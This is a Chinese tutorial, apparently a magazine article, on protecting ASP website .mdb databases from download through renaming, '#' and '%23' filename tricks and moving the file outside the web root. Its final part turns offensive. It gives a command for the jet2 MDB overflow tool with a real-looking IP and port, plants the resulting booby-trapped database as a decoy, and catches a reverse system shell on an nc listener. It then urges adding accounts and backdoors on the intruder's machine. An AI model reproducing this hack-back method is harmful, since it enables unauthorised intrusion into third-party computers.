保护数据库_防止【妙招防止数据库被下载】

　　很多动态站点大量地应用了数据库，数据库理所当然成为一个站点的核心文件。一旦数据库被人下载，极有可能被恶意人士用来破坏网站，或者窃取资料。实在痛心啊！有什么方法可以防止数据库被入侵者下载呢？
　　
　　网上讲解了好多关于防止数据库被下载的办法，我在这里为大家先简单小结一下，也算是个回顾。方法一：修改原始数据库的文件名并在conn.asp中做相应修改；方法二：修改数据库后缀为ASP；方法三：在数据库文件名中加入“#”字符；方法四：加密数据库（不过效果几乎为0）；方法五：将数据库文件放在其他目录而不放在网站目录；方法六：我自创的方法，稍后将会介绍。
　　上面五种方法也是一般管理员经常用到的方法，在这里我大体解释一下：
　　方法一中一般我们喜欢用别人的整站程序，由于许多整站程序都是公开的，这样一来数据库的路径也是公开的，如果不修改的话攻击者可以通过IE或flashget下载网站数据库；
　　方法二中将数据库后缀改为ASP能防止攻击者用IE下载数据库，但却不能防止用flashget下载，只要在flashget中填入下载地址便可将其下载，原因是因为IE只会将其做为asp文件进行解析，而不会认为其是数据库文件让你下载；
　　方法三中加入“#”字符原理是因为通过IE下载文件时只能识别 “#”号前名的部分，对于“#”后面的会自动去掉，比如数据库名为jsj#h.mdb，当你在IE中输入https://www.省略/jsj#h.mdb的时候，IE却会在网站目录中寻找jsj（当然也不是jsj.mdb），由于网站目录并中没有jsj这个文件，所以导致下载终止。但是当我们将https://www.省略/jsj#h.mdb这个地址改为https://www.省略/jsj%23h.mdb的时候却可以通过IE正常下载了，有人又问如果地址是https://www.省略/jsj#h.asp呢？很简单，直接通过flashget就可以下载了。
　　方法五在此我演示一下，原来的conn.asp文件如图1，数据库的文件名为myleaf.asp，站点目录名为jsj,我们在与站点同一级目录下建立一个名为data的文件夹，将原来的myleaf.asp数据库文件移动到data目录下，再将conn.asp改为图2所示即可，这样一来就算暴露了conn.asp文件，攻击者也不能将数据库下载下来，因为数据库文件不在站点文件夹中。
　　下面我介绍下自己的方法。说出来其实也很简单。步骤如下：
　　1.将原来数据库myleaf.asp的名字改为my%23leaf.asp；
　　2.在conn.asp中做相应修改。只需两步即可。这样一来不管攻击者是通过IE还是flashget够无法下载数据库。
　　为了验证我们做个实验，我在本地已经搭建了web服务器，在IE地址栏中输入https://127.0.0.1/my%23leaf.asp，如图3，显示网页错误，同样我们用flashget下载地址为https://127.0.0.1/my%23leaf.asp时也出现了错误，如图4，5。很明显实验成功！
　　在这里我们还可以愚弄下入侵者，如何愚弄呢？我们在网站目录下建立一个名为my#leaf.asp文件，里面随便写些文字，当对方用flashget试图下载my%23leaf.asp数据库时下载的却是my#leaf.asp这个文件。同样当入侵者在IE中输入https://127.0.0.1/my%23leaf.asp时，显示的也只是my#leaf.asp中的内容，如图6。（因为flashget和IE都将%23解析为#了）
　　为了给入侵者一个教训让他以后能够收敛些，我们可以反向入侵他们，如何做到这一点呢？用到的工具是jet2.exeMDB溢出工具，JET2的使用格式为：jet2 1 你的IP端口，很明显是反弹溢出。我们在命令行下输入jet2 218.27.161.49 1314 如图7，这样在桌面上便会生成一个名为db1.mdb的数据库文件，我们将此文件名改为my#leaf.asp放入网站目录，同时我们在本地用nc监听，如图8。
　　当攻击者试图下载真正的数据库文件my%23leaf.asp时下的是my#leaf.asp文件，当他们下载完毕将my#leaf.asp改为my#leaf.mdb并试图用辅臣数据库浏览器打开这个mdb文件时候才出现了图9的界面，我们成功得到了攻击的systemshell。
　　得到systemshell后还有我们所不能做的吗？加帐号也好，留后门也好，都随便你了，尽情发挥！
本文为全文原貌 未安装PDF浏览器用户请先下载安装 原版全文